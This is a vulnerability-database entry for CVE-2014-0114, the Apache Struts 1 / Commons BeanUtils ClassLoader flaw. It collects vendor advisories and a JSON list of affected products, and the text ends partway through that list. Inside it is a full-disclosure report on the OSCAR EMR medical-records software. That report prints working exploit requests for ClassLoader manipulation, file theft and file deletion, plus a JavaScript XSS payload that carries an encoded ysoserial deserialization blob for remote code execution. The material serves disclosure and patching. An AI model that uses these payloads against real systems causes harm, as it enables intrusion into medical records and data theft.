Search

Find a vulnerability

Search criteria

    97 vulnerabilities found for connections by ibm

    VAR-201404-0288

    Vulnerability from variot - Updated: 2026-03-09 21:53

    Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485 Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484 Improper authentication (CWE-287) - CVE-2020-14494 Lack of certification (CWE-862) - CVE-2020-14491 Execution with unnecessary privileges (CWE-250) - CVE-2020-14493 Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488 Path traversal (CWE-22) - CVE-2020-14490 Inappropriate authorization process (CWE-285) - CVE-2020-14486 Cross-site scripting (CWE-79) - CVE-2020-14492 Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489 Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485 A remote attacker bypasses the system's account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484 In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494 The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491 In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493 The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488 Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490 By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486 Malicious code is executed on the user's browser because the user's input value is not properly validated. - CVE-2020-14492 Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489 A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html


    Updated Packages:

    Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm

    Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm

    Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/en/support/security/advisories/

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

    iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell


    Product Description:

    "OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System."


    Timeline:

    29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed


    Contents:

    This report uses OVE identifiers: http://www.openwall.com/ove/

    OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery


    Issue details:

    === OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===

    OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.

    An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster

    Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz

    An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid

    === OVE-20160329-0003: Remote code execution via unsafe object deserialization ===

    TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.

    In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well.

    === OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===

    logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:

    var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);

    XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)

    === OVE-20160329-0007: SQL injection ===

    On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.

    === OVE-20160329-0008: Path traversal ===

    ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).

    Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz

    An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp

    === OVE-20160329-0002: Insecure direct object reference in document manager ===

    ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.

    === OVE-20160329-0005: Denial of service via resource exhaustion ===

    uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).

    === OVE-20160329-0006: Insecure password storage ===

    Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.

    === OVE-20160329-0009: Cross-site request forgery ===

    The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ===================================================================== Red Hat Security Advisory

    Synopsis: Important: struts security update Advisory ID: RHSA-2014:0474-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0474.html Issue date: 2014-05-07 CVE Names: CVE-2014-0114 =====================================================================

    1. Summary:

    Updated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5.

    The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.

    1. Relevant releases/architectures:

    RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64

    1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)

    All struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect.

    1. Solution:

    Before applying this update, make sure all previously released errata relevant to your system have been applied.

    This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258

    1. Bugs fixed (https://bugzilla.redhat.com/):

    1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters

    1. Package List:

    RHEL Desktop Workstation (v. 5 client):

    Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm

    i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm

    x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm

    Red Hat Enterprise Linux (v. 5 server):

    Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm

    i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm

    ia64: struts-1.2.9-4jpp.8.el5_10.ia64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm struts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm

    ppc: struts-1.2.9-4jpp.8.el5_10.ppc.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm struts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm

    s390x: struts-1.2.9-4jpp.8.el5_10.s390x.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm struts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm

    x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm

    These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

    1. References:

    https://www.redhat.com/security/data/cve/CVE-2014-0114.html https://access.redhat.com/security/updates/classification/#important

    1. Contact:

    The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

    Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

    iD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR HJqJt2S278nXdfwLyGc7EJQ= =qMuX -----END PGP SIGNATURE-----

    -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09


                                           https://security.gentoo.org/
    

    Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09


    Synopsis

    Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.

    Workaround

    There is no known workaround at this time.

    Resolution

    All Commons BeanUtils users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"

    References

    [ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    https://security.gentoo.org/glsa/201607-09

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

    License

    Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5

    . Description:

    AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to in the References section. Solution:

    Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.

    The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04311273

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c04311273 Version: 1

    HPSBGN03041 rev.1 - HP IceWall Configuration Manager running Apache Struts, Remote Execution of Arbitrary Code

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2014-05-26 Last Updated: 2014-05-26

    Potential Security Impact: Remote execution of arbitrary code

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP IceWall Configuration Manager running Apache Struts.

    References: CVE-2014-0114, SSRT101566

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP IceWall Configuration Manager 3.0 running Apache Struts 1

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2014-0114 (AV:N/AC:L/Au:S/C:P/I:P/A:P) 6.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has provided mitigation information to protect against potential risk to HP IceWall Configuration Manager running Apache Struts.

    Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is available at the following location:

    http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a pplications/ba-p/6463188#.U2J7xeaSxro

    Japanese information is available at the following location:

    http://www.hp.com/jp/icewall_patchaccess

    Note: The HP IceWall product is only available in Japan.

    HISTORY Version:1 (rev.1) - 26 May 2014 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

    Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

    Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

    Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

    3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

    Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.2.4"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.2.7"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.2.6"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.3.10"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.2.2"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.3.5"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.2.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.3.8"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apache",
            "version": "1.2.9"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "hitachi",
            "version": "-09-00-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-09-50-03"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-09-50-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-09-10-10"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-09-00-12"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-08-50-13"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-08-50-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-10-00-03"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-10-00-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "-09-10-00"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.0.2"
          },
          {
            "_id": null,
            "model": "tiered storage manager software -00 )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "7.3-00"
          },
          {
            "_id": null,
            "model": "commons beanutils",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "1.9.1"
          },
          {
            "_id": null,
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "device manager software -00 )",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "7.4-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "-08-11-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "-08-00-00"
          },
          {
            "_id": null,
            "model": "openclinic ga",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "openclinic ga",
            "version": null
          },
          {
            "_id": null,
            "model": "openclinic ga",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "openclinic ga",
            "version": "version 5.09.02"
          },
          {
            "_id": null,
            "model": "openclinic ga",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "openclinic ga",
            "version": "version 5.89.05b"
          },
          {
            "_id": null,
            "model": "terasoluna server framework for java",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "ntt data",
            "version": "2.0.0.1 to 2.0.5.1"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
